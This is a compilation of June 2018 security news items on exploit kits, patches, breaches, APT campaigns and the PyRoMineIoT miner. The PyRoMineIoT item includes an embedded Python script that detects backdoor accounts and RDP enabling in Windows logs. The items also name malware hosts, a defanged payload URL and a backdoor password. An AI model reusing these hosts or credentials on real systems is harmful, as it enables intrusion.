Magnitude continues to focus on South Korea and is now targeting both CVE-2018-4878 and CVE-2018-8174. The toolkit is considered one of the most sophisticated EKs on the market, courtesy of its own Magnigate filtering, a Base64-encoded landing page, and fileless payload.

Another active EK is GreenFlash Sundown. Rather elusive in nature, it “continues to strike via compromised OpenX ad servers” and now targets CVE-2018-4878 too. Usually delivering the Hermes ransomware, it was recently observed serving a cryptocurrency miner.

The GrandSoft EK, which only targets Internet Explorer and also appears in smaller distribution campaigns, is still relying on the older CVE-2016-0189 Internet Explorer exploit. Lacking the obfuscation EK landing pages usually feature, the toolkit was observed delivering payloads such as the AZORult stealer.

“There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits,” Malwarebytes concludes.


Australia Agrees Solomons Internet Cable After China Concern
13.6.2018 securityweek IT

Australia will help fund and build an underseas communications cable to the Solomon Islands, it was agreed Wednesday, after the Pacific nation was convinced to drop a contract with Chinese company Huawei.

The impoverished country and Huawei inked a deal in late 2016 to construct the fibre-optic cable from Australia to Honiara to improve its often unreliable internet and phone services.

But Solomon Islands Prime Minister Rick Houenipwela said last week there had been a change of heart following "some concerns raised with us by Australia", without elaborating.

The move comes with Australia refocusing its foreign aid programmes to win hearts and minds in the island nations of the Pacific, as China flexes its muscle in the region.

It pledged more than Aus$1.3 billion (US$970 million) in its national budget last month to fund projects such as the communications cable, which will also link up with Papua New Guinea.

Canberra and other regional capitals have become increasingly alarmed at Beijing's push into the Pacific through "soft diplomacy", which could potentially upset the strategic balance in the region.

Australian Foreign Minister Julie Bishop refused to detail what concerns Canberra had with telecom giant Huawei.

"I would not elaborate on security issues, that's not appropriate," she told reporters.

"What we have offered the Solomon Islands, and they have accepted, is an alternative to the offer, and ours is cheaper. It's likely to be a faster result for them, and technically superior."

Huawei was blocked from bidding for contracts on Australia's ambitious national broadband project in 2012, reportedly due to concerns about cyber-security.

Huawei has long disputed claims of any links to the Chinese government.

According to broadcaster ABC, Australia's spy boss Nick Warner and other senior officials visited the Solomons last year and returned with concerns about Huawei being permitted to plug into the country's telecommunications infrastructure.

They reportedly believed that while Huawei was an independent company, it retained links to the Chinese government and could pose a threat to Australian infrastructure in the future.

After meeting Houenipwela in Canberra Wednesday, Prime Minister Malcolm Turnbull said Australia will also jointly fund a domestic telecommunication cable network linking remote provinces in the Solomons to the capital Honiara.

"As we step up our engagement in the Pacific, we are working as partners with Solomon Islands more closely than ever to ensure stability, security and prosperity in the region," he said.


DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.2018 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 2018, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, The Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be easier sifted with AI than manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears it will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.


SAP Releases Critical Updates for Two Security Notes
13.6.2018 securityweek Vulnerability

Of the ten Security Notes in SAP’s June 2018 Security Patch Day, five were updates for previously released Notes, including two rated Hot News (Critical severity).

Impacting SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66), the two Hot News Security Notes feature CVSS scores of 9.8 and 9.1, respectively.

The former is an update for a Security Note released on April 2018 Patch Day, described as security updates for third party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day, described as an OS command injection vulnerability in the Report for Terminology Export component.

The remaining Security Notes address four vulnerabilities considered High severity (including an update to a Security Note released on April 2018 Patch Day) and four Medium risk flaws (two are updates to Security Notes released on August 2014 Patch Day and May 2018 Patch Day, respectively), SAP’s advisory reveals.

The most important of the high-risk flaws is an information disclosure vulnerability (CVE-2018-2425) in SAP Business One (CVSS Base Score: 8.4). The bug exists in the Business One version for the SAP HANA backup service and could allow an attacker to access information which would otherwise be restricted, Onapsis explains.

Next in line is a remote command execution flaw (CVE-2015-0899) in SAP Internet Sales (CVSS Base Score: 7.5), followed by a denial-of-service bug (CVE-2014-0050) in SAP Internet Sales (CVSS Base Score: 7.3).

The last high-risk Security Note released this month is an update to a previous Note addressing CVE-2018-2408 (CVSS Base Score: 7.3), an improper session management bug in SAP Business Objects.

The Medium risk flaws addressed this month include a cross-site scripting (XSS) vulnerability in SAPUI5 (CVE-2018-2424) and information disclosure in UI5 Handler (CVE-2018-2428). They are accompanied by an update to a Security Note addressing a potential remote code execution in SAP CrystalReports, and another patching a missing XML validation vulnerability in SAP Identity Management (CVE-2018-2416).

According to ERPScan, a company that secures Oracle and SAP products, the June 2018 Patch Day also includes 4 Support Package Notes, for a total of 14 Notes. Half of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most common vulnerability types addressed this month are XSS and remote command execution, followed by implementation flaws and information disclosure. SAP also addressed XML external entity, DoS, OS command execution, and buffer overflow issues.


Google Removes Inline Installation of Chrome Extensions
13.6.2018 securityweek Crime

Google this week detailed plans to completely remove the inline installation of Chrome extensions from its web browser by the end of the year.

Introduced in 2011, inline installation was meant to make it easier for users to add extensions to the browser by installing them directly from the developer’s website instead of having to go to the Chrome Web Store.

Starting this Tuesday, June 12, inline installation is no longer available for newly published extensions. This fall, however, the change will also affect existing extensions, Google says.

“Extensions first published on June 12, 2018 or later that attempt to call the chrome.webstore.install() function will automatically redirect the user to the Chrome Web Store in a new tab to complete the installation,” James Wagner, Extensions Platform Product Manager at Google, explains.

The next stage will enter into effect on September 12, 2018. Starting that day, inline installation will be disabled for existing extensions, meaning that all users will be automatically redirected to the Chrome Web Store in order to complete installations.

The final nail in the coffin, however, will be put in early December 2018, when Chrome 71 arrives. That browser release, the search company says, will be stripped of the inline install API method.

“Later this summer, inline installation will be retired on all platforms. Going forward, users will only be able to install extensions from within the Chrome Web Store, where they can view all information about an extension’s functionality prior to installing,” Wagner revealed.

According to Google, the removal of inline installation of extensions would add more transparency for Chrome users. Many of these users, the company claims, complain about unwanted extensions on their browser, with most of the complaints referring to “confusing or deceptive uses of inline installation on websites.”

To eliminate the issue, the search provider says, users will be redirected to the Chrome Web Store instead, where detailed information on what’s being installed is available. Thus, users will “fully understand how their browsing experience will be impacted.”

Developers with extensions that use inline installation need to update the install buttons on their website to link to the extension’s Chrome Web Store page prior to the stable release of Chrome 71.

Several years ago, Google disabled the inline installations for Chrome extensions for developers who used deceptive tactics to trick users into installing their products.

Over the past several years, millions of Chrome users were impacted by malicious extensions published to the Chrome Web Store. Some of these applications could lead to the injection and execution of arbitrary JavaScript code, while others were hijacked to display potentially malicious ads and steal user credentials.


Chinese Cyberspies Target National Data Center in Asia
13.6.2018 securityweek APT

A China-linked cyber espionage group has targeted a national data center in Central Asia and experts believe the goal is to conduct watering hole attacks on the country’s government websites.

The threat actor is tracked as LuckyMouse, Emissary Panda, APT27 and Threat Group 3390. The group has been active since at least 2010, targeting hundreds of organizations around the world, including U.S. defense contractors, financial services firms, a European drone maker, and the U.S.-based subsidiary of a French energy management company.

Researchers at Kaspersky Lab recently identified a new attack carried out by this actor. The security firm spotted the campaign in March 2018, but believes it was launched in the fall of 2017.

The attack targeted a national data center in an unnamed country in Central Asia. Researchers say the goal is likely to inject malicious JavaScript code into the government websites connected to the data center in order to conduct watering hole attacks.

When accessed, the compromised government websites served either the Browser Exploitation Framework (BeEF), a penetration testing suite that focuses on the web browser, or the ScanBox reconnaissance framework.

Kaspersky has not been able to determine how the national data center was breached, but believes the hackers may have used watering hole attacks aimed at the organization’s employees or weaponized Office documents – the threat group has been spotted using CVE-2017-11882.

The attack involved a piece of malware tracked by Kaspersky as HyperBro, a RAT that has been used by several Chinese-speaking threat actors. The samples analyzed by Kaspersky had timestamps ranging from December 2017 to January 2018, with evidence found by experts suggesting that the malware had made its way to the data center sometime in mid-November 2017.

The main command and control (C&C) server used in this campaign is hosted on an IP address associated with a Ukrainian ISP. Specifically, the IP belongs to a MikroTik router running a firmware version released in March 2016.

“A national data center is a valuable source of data that can also be abused to compromise official websites,” Kaspersky researchers said in a blog post. “Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.”


Dixons Carphone data breach, 5.9 million payment cards exposed
13.6.2018 securityaffairs Incident

Retailer Dixons Carphone has disclosed a security breach that involved 5.9 million payment cards and 1.2 million personal data records.
Dixons Carphone discovered “unauthorised access” to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

“As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company.” reads the data breach notification published by the company.

“Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.”

The retailer explained that it has no evidence to date of any abuse of the data as a result of the hack. The bad news for customers is that the compromised information included payment card data.

Dixons Travel confirmed that hackers could have accessed data on 5.9 million cards stored in one of the processing systems of Currys PC World and Dixons Travel stores. The company highlighted that 5.8 million of these cards have chip and PIN protection; for these cards, the data accessed contains neither PIN codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.

Roughly 105,000 non-EU issued payment cards that do not use chip and PIN protection have been compromised.

The firm notified the relevant card companies via its payment provider about all compromised cards.

“Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.” added the company.

This isn’t the first time the company has suffered a security breach: in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are nevertheless potentially exposed to phishing attacks and should remain vigilant.


Microsoft Releases Mitigations for Spectre-Like 'Variant 4' Attack
13.6.2018 securityweek Vulnerability

Updates released by Microsoft on Tuesday for its Windows operating system add support for a feature that should prevent attacks involving the recently disclosed speculative execution vulnerability known as “Variant 4.”

Researchers from several organizations warned in January that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. The flaws are tracked as Spectre (Variant 1 - CVE-2017-5753 and Variant 2 - CVE-2017-5715) and Meltdown (Variant 3 - CVE-2017-5754).

Last month, Intel, AMD, ARM, IBM, Microsoft and other major tech companies released updates, mitigations and advisories for two new variants of the speculative execution attack methods, namely Variant 3a and Variant 4.

Variant 4, which is similar to Spectre Variant 1, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639.

Microsoft has not identified any code patterns – in either its software or cloud services – that would allow Variant 4 attacks. However, the company announced on Tuesday – along with its monthly security updates – that it added support for Speculative Store Bypass Disable (SSBD) to Windows and Azure in an effort to completely eliminate the risk of attacks.

SSBD is designed to prevent a Speculative Store Bypass from occurring, but Microsoft noted that enabling the feature also requires microcode updates from Intel.

Microsoft has released updates that include the mitigation for Windows 10, Windows 7, Windows Server 2008, Windows Server 2016, and Windows Server versions 1709 and 1803. Support for SSBD has only been added for machines with Intel processors, but the company is working on updates for AMD devices as well. Systems powered by AMD CPUs will not require microcode updates.

When Variant 4 was disclosed, Intel announced that it had provided beta microcode updates to operating system vendors and equipment manufacturers to add support for SSBD.

However, Intel says the mitigation will be turned off by default and the company believes many will leave it that way.

Enabling SSBD may have some negative impact on performance, Microsoft and Intel said. Intel told customers last month that performance impact during its tests ranged between 2 and 8 percent.


Microsoft Patches 11 Critical RCE Flaws in Windows, Browsers
13.6.2018 securityweek Vulnerability

Microsoft’s Patch Tuesday updates for June 2018 address a total of 50 vulnerabilities, including nearly a dozen critical remote code execution flaws affecting Windows and the company’s Edge and Internet Explorer web browsers.

None of the security holes patched this month appear to have been exploited for malicious purposes, but one of them has been publicly disclosed before the release of a fix. The disclosed vulnerability is a use-after-free issue that allows an attacker to execute arbitrary code if they can convince the targeted user to open a malicious web page or file. The weakness was reported to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), which made some details public after its 120-day deadline expired.

The list of critical vulnerabilities also includes CVE-2018-8225, which impacts the Windows DNS component DNSAPI.dll. An attacker can leverage this flaw to execute arbitrary code in the context of the Local System Account by using a malicious DNS server to send specially crafted DNS responses to the targeted system.

Another critical RCE flaw, which Microsoft believes could be exploited in the wild at some point, is CVE-2018-8251 and it impacts the Windows Media Foundation component. An attacker can exploit this flaw to take complete control of a system by getting the targeted user to open a malicious web page or document.

A security hole affecting the HTTP Protocol Stack (Http.sys) allows remote code execution by sending a specially crafted packet to the targeted server. While the flaw can be exploited without authentication and is considered critical, Microsoft believes exploitation is “less likely.”

The latest security updates also resolve a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, related to an issue disclosed earlier this year by researchers Amichai Shulman and Tal Be’ery, has been classified as “important” as exploitation requires physical or console access and the targeted system needs to have Cortana enabled.

Microsoft also released some mitigations for the recently disclosed Variant 4 of the Spectre/Meltdown vulnerabilities.

Adobe has yet to release any Patch Tuesday updates, but the company did resolve a Flash Player zero-day vulnerability earlier this month. The researchers who came across the exploit revealed that the flaw had been leveraged in attacks aimed at entities in the Middle East.


PyRoMineIoT spreads via EternalRomance exploit and targets IoT devices in Iran and Saudi Arabia.
13.6.2018 securityaffairs Virus

Fortinet discovered PyRoMineIoT, a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance exploit to spread.
PyRoMineIoT is a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance remote code execution exploit to spread; the malware also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

PyRoMineIoT is quite similar to another crypto-currency miner, dubbed PyRoMine, that was first spotted a few weeks ago; PyRoMine infections have increased rapidly since April, most of them in Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

According to Fortinet, the older miner was improved with some obfuscation; the latest variant is hosted on the same IP address 212[.]83.190[.]122, and both variants leverage the EternalRomance implementation found on the Exploit Database website.

PyRoMineIoT is delivered from a website disguised as security updates for web browsers.

Once the PyRoMineIoT malware has compromised a device, it downloads an obfuscated VBScript with the same functionality as the one used by the PyRoMine variant, but with better-organized code.

The VBScript also downloads other components, including a Monero miner (XMRig), but unlike the previous variant it uses random names for the files.

“As with the previous version of PyRoMine, this new version is hosted on the same IP address 212.83.190.122. The downloaded file is an executable compiled with PyInstaller, which is a program that packages programs written in Python into stand-alone executables. This means that there is no need to install Python on the machine in order to execute the Python program.” reads the analysis published by Fortinet.

Both variants set up a “Default” account with the password P@ssw0rdf0rme and add it to the local groups “Administrators,” “Remote Desktop Users,” and “Users”; they then enable RDP and add a firewall rule to allow traffic on port 3389.
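The account-creation and RDP-enabling sequence described above is a persistence pattern a defender can hunt for in the Windows Security log. The following is an added example, not Fortinet's code or anything from the PyRoMineIoT analysis: it correlates event records of the kinds Windows writes for this sequence (4720 account created, 4732 member added to a security-enabled local group, 4946 firewall exception rule added) within a short window and flags a freshly created account that lands in Administrators or Remote Desktop Users. The simplified JSON-lines layout, the host names, account names and timestamps are constructed for the example, not taken from a real export.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events in a simplified JSON-lines layout (an assumption
# for this example, not a real EVTX/Event Viewer export). Event IDs follow the
# Windows Security log: 4720 = user account created, 4732 = member added to a
# security-enabled local group, 4946 = firewall exception rule added.
# Host names, times and account names are made up.
SAMPLE_EVENTS = r"""
{"time": "2018-06-12T09:00:01", "id": 4624, "host": "WS01", "TargetUserName": "alice"}
{"time": "2018-06-12T09:02:10", "id": 4720, "host": "WS01", "TargetUserName": "Default", "SubjectUserName": "alice"}
{"time": "2018-06-12T09:02:11", "id": 4732, "host": "WS01", "TargetUserName": "Administrators", "MemberName": "WS01\\Default"}
{"time": "2018-06-12T09:02:11", "id": 4732, "host": "WS01", "TargetUserName": "Remote Desktop Users", "MemberName": "WS01\\Default"}
{"time": "2018-06-12T09:02:12", "id": 4732, "host": "WS01", "TargetUserName": "Users", "MemberName": "WS01\\Default"}
{"time": "2018-06-12T09:02:14", "id": 4946, "host": "WS01", "RuleName": "allow3389"}
{"time": "2018-06-12T14:30:00", "id": 4720, "host": "WS02", "TargetUserName": "svc_backup", "SubjectUserName": "admin"}
{"time": "2018-06-12T15:45:00", "id": 4732, "host": "WS02", "TargetUserName": "Users", "MemberName": "WS02\\svc_backup"}
"""

# Groups that give a new local account interactive or administrative access.
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
# How long after account creation group and firewall changes are still tied to it.
CORRELATION_WINDOW = timedelta(minutes=10)


def parse_events(text):
    """Parse JSON-lines events into dicts with a datetime 'time' field, oldest first."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def _member_account(member_name):
    """'HOST\\name' or 'DOMAIN\\name' -> 'name' (case kept as logged)."""
    return member_name.split("\\")[-1]


def find_rdp_backdoor_accounts(events, window=CORRELATION_WINDOW):
    """Flag accounts created on a host and, within `window`, added to a
    privileged local group. A firewall exception added in the same window
    raises the severity, since it matches the RDP-enabling step."""
    findings = []
    for created in (e for e in events if e["id"] == 4720):
        host = created["host"]
        account = created["TargetUserName"]
        start, end = created["time"], created["time"] + window
        groups = set()
        firewall_rule_added = False
        for ev in events:
            if ev["host"] != host or not (start <= ev["time"] <= end):
                continue
            if ev["id"] == 4732 and _member_account(ev.get("MemberName", "")).lower() == account.lower():
                groups.add(ev["TargetUserName"])
            elif ev["id"] == 4946:
                firewall_rule_added = True
        if groups & PRIVILEGED_GROUPS:
            findings.append({
                "host": host,
                "account": account,
                "created_by": created.get("SubjectUserName"),
                "groups": sorted(groups),
                "firewall_rule_added": firewall_rule_added,
                "severity": "high" if firewall_rule_added and "Remote Desktop Users" in groups else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in find_rdp_backdoor_accounts(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity']}] {f['host']}: account '{f['account']}' created by "
              f"{f['created_by']}, groups={f['groups']}, firewall_rule_added={f['firewall_rule_added']}")
```

The rule deliberately keys on the sequence (creation, privileged group membership, firewall change on the same host within minutes) rather than on the account name “Default” or the password, both of which an author can change in seconds. Event 4946 records the rule name and ID, not the port, so confirming that the new rule opens 3389 needs the rule details or the host's RDP configuration; the sample run flags only WS01, while the WS02 service account that is only added to Users, more than an hour after creation, is left alone.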

Once it has compromised a device, PyRoMineIoT attempts to remove the PyRoMine variant if present.

The analysis of one of the pool addresses used by the threat actors behind the malware revealed it earned around 5 Monero (about $850).

The victim downloads a fake update as a .zip archive containing a downloader written in C# that fetches the miner file, a Python-based malware that leverages EternalRomance to spread the downloader, and other malicious components.

“One of the downloaded components is a Python-based malware that takes advantage of the NSA exploit ETERNALROMANCE to spread the agent to vulnerable machines in the network. Another component is a tool that steals user credentials from Chrome browser named ChromePass.” continues the analysis.

“Another component scans for vulnerable IoT devices in Iran and Saudi Arabia that use the login credentials “admin” for username and password.”


The EternalRomance implementation collects the IPs of the local subnets and targets them, attempting to spread with the username ‘aa’ and an empty password.

Another component used by the malware is ChromePass, a legitimate tool that recovers credentials saved in Chrome.

Once the credentials are collected by the malware, it saves them in XML format and uploads the file to an account on DriveHQ’s cloud storage service.

PyRoMineIoT searches for vulnerable IoT devices, but for now it only targets those in Iran and Saudi Arabia.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem.” Fortinet concludes.

“We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices.”


North Korea-linked Lazarus APT behind recent ActiveX attacks
13.6.2018 securityaffairs APT

North Korea-linked Lazarus APT group planted an ActiveX zero-day exploit on the website of a South Korean think tank focused on national security.
According to researchers at AlienVault, North Korea-linked hackers planted an ActiveX zero-day exploit on the website of a South Korean think tank focused on national security.

The experts attributed the attacks to the notorious Lazarus APT group; they pointed out that ActiveX controls are usually disabled on most systems, but South Korean government authorities require citizens to enable them.

“Recently, an ActiveX zero-day was discovered on the website of a South Korea think tank that focuses on national security. Whilst ActiveX controls are disabled on most systems, they are still enabled on most South Korean machines due to mandates by the South Korean government.” reads the post published by Alien Vault.

“These attacks have been attributed to Lazarus, a group thought to be linked to North Korea.”

Of course, attackers aiming at South Korean targets can leverage ActiveX controls in their attacks, and many attacks that abused these controls against South Korean targets have been attributed to North Korean hackers.

Recently, experts observed attacks in which hackers leveraged JavaScript code to deploy ActiveX exploit code.

Initially, local media attributed the attacks to the Andariel gang, a group considered part of the Lazarus APT group.

The investigation conducted by AlienVault pointed out the Lazarus APT as the threat actor that launched the attacks that abused the ActiveX controls.

The recent attacks featured a profiling script used to gather intelligence on the targets, an attack scheme commonly used by threat actors including the Lazarus group.

The attackers also used scripts capable of gathering additional information from potential targets and delivering the ActiveX exploit.

Simon Choi, the founder of the Cyber Warfare Intelligence Center and IssueMakersLab, published a tweet with some details of these scripts.

The expert suggests the initial reconnaissance scripts were deployed in January 2017, while the malicious ActiveX exploit scripts were injected in late April 2018.

Simon Choi (@issuemakerslab), 9:21 AM - May 24, 2018: "North Korea's Watering Hole Attack History (case, Sejong Institute)"

The reconnaissance script identifies the browser and operating system running on the target computer; it is based on PinLady’s Plugin-Detect code. If Internet Explorer is detected, the script checks whether ActiveX is enabled and which plugins from a specific list of ActiveX components are running.

“Whilst these malicious files have been taken down, a record of the same infection is preserved on urlscan. The malicious script is hidden at http://www.sejong[.]org/js/jquery-1.5.3.min.js.” continues the analysis.

“This script is similar to typical exploit kits – it identifies which browser and operating system the user is running. Much of the code is taken from PinLady’s Plugin-Detect. If a target is running Internet Explorer, it checks if it is enabled to run ActiveX, and what plugins are enabled from a specific list of ActiveX components.”

One of the profiling scripts used in the last attacks sends data to a website that was used as a command and control (C&C) server by Lazarus APT malware in 2015.

Choi also shared the ActiveX exploit on Twitter; attackers used it to download malware from peaceind[.]co.kr.

“If successful, it downloads malware from: http://www.peaceind[.]co.kr/board/skin_poll/gallery/poll.php” continues AlienVault.

“To a file named splwow32.exe. Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable.”

Experts noticed that the malicious code is a backdoor tracked as Akdoor that is designed to execute commands using Command Prompt.

Further details, including IoCs, are reported in the analysis published by AlienVault.


Microsoft Patch Tuesday updates for June 2018 addresses 11 Critical RCE Flaws
13.6.2018 securityaffairs
Vulnerebility

Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 vulnerabilities, 11 of which are critical remote code execution flaws.
In total, the updates address 50 flaws: 11 critical remote code execution vulnerabilities and 39 issues rated as important.

The tech giant also issued some mitigations for the recently discovered Spectre/Meltdown Variant 4 vulnerabilities.

The critical issues affect Windows and the company’s web browsers, Edge and Internet Explorer.

None of the patched vulnerabilities had been exploited in attacks in the wild; only one of them, a remote code execution flaw in the scripting engine tracked as CVE-2018-8267, had been publicly disclosed before the fix was released.

The flaw is a remote memory-corruption issue in the Internet Explorer rendering engine. It is triggered when the engine fails to properly handle error objects, and an attacker could exploit it to execute arbitrary code in the context of the currently logged-in user.

Microsoft acknowledged the security researcher Dmitri Kaslov for reporting the flaw.

The most critical flaw addressed by the Patch Tuesday updates for June 2018 is a remote code execution vulnerability tracked as CVE-2018-8225 that resides in Windows Domain Name System (DNS) DNSAPI.dll.

The flaw affects all versions of Windows from 7 to 10, as well as Windows Server editions, and is tied to the way Windows parses DNS responses.

An attacker could exploit the flaw by sending corrupted DNS responses to a targeted system from an attacker-controlled DNS server. Successful exploitation allows the attacker to run arbitrary code in the context of the Local System account.

“This vulnerability could allow an attacker to execute code at the local system level if they can get a crafted response to the target server. There are a couple of ways this could happen.” reads the analysis published by Trend Micro Zero Day Initiative (ZDI).

